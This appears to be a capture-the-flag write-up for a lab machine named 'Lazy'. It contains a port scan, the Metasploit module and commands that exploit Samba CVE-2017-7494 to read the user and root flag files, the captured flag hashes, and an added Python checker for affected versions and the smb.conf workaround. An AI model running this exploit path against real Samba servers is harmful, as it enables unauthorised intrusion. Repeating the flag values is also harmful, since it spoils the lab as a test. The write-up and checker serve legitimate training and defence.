Info
- Name – Lazy
- IP Address – 172.31.1.1
Enumeration
Open Ports
Port | Protocol | Service | Version |
22 | tcp | ssh | OpenSSH 5.9p1 Debian 5ubuntu1.10 |
68 | udp | dhcpc (filtered) | |
80 | tcp | http | nginx 1.1.19 |
137 | udp | netbios-ns (filtered) | |
138 | udp | netbios-dgm (filtered) | |
139 | tcp | netbios-ssn | Samba smbd 3.X – 4.X |
445 | tcp | netbios-ssn | Samba smbd 3.6.25 |
49152 | udp | unknown (filtered) | |
Exploitation
Exploit Details (Metasploit)
- Name – Samba is_known_pipename() Arbitrary Module Load
- CVE – 2017-7494
- Module – exploit/linux/samba/is_known_pipename
- Disclosed – 2017-03-24
- References
Show Metasploit options
show options
Run exploit commands
run
whoami
cat /home/adam/access.txt
cat /root/system.txt
Loot
access.txt - 899661bdf5057dabf7c652dd75f00fb8
system.txt - 17307fd709f556f59e2c698b7495476c
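
Defender-side check
The step from the scan table to the exploit is a version match: the Samba 3.6.25 banner on port 445 falls inside the range affected by CVE-2017-7494. The following is an added example, not part of the original writeup, that performs that match for a banner and checks an smb.conf for the workaround; the fixed releases and the `nt pipe support = no` setting are taken from the Samba advisory for this CVE, and the function names are illustrative.

```python
import re

# Per the Samba advisory for CVE-2017-7494: affected from 3.5.0 onwards,
# fixed upstream in 4.6.4, 4.5.10 and 4.4.14.
FIRST_AFFECTED = (3, 5, 0)
FIXED = {(4, 4): (4, 4, 14), (4, 5): (4, 5, 10), (4, 6): (4, 6, 4)}

def parse_version(banner):
    """Return (major, minor, patch) from a service banner, or None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    return tuple(int(x) for x in m.groups()) if m else None

def version_affected(version):
    if version < FIRST_AFFECTED:
        return False
    fixed = FIXED.get(version[:2])
    if fixed is not None:
        return version < fixed
    # No upstream fix release on this branch: 3.5 to 4.3 stay affected
    # (distro backports are invisible in the banner), 4.7+ shipped fixed.
    return version < (4, 4, 0)

def pipe_support_disabled(smb_conf):
    """True if [global] sets 'nt pipe support' to a false value."""
    section, disabled = None, False
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, value = (p.strip().lower() for p in line.split("=", 1))
            if "".join(key.split()) == "ntpipesupport":
                disabled = value in ("no", "false", "off", "0")
    return disabled

def assess(banner, smb_conf=""):
    version = parse_version(banner)
    if version is None:
        return "unknown"  # range-only banner such as "3.X - 4.X"
    if not version_affected(version):
        return "not affected"
    return "mitigated" if pipe_support_disabled(smb_conf) else "affected"

if __name__ == "__main__":
    # Banners as reported in the scan table above.
    for banner in ("Samba smbd 3.6.25", "Samba smbd 3.X - 4.X"):
        print(banner, "->", assess(banner))
```

A banner match only flags candidates: distribution packages often carry the fix without changing the upstream version string, so confirm against the installed package's changelog.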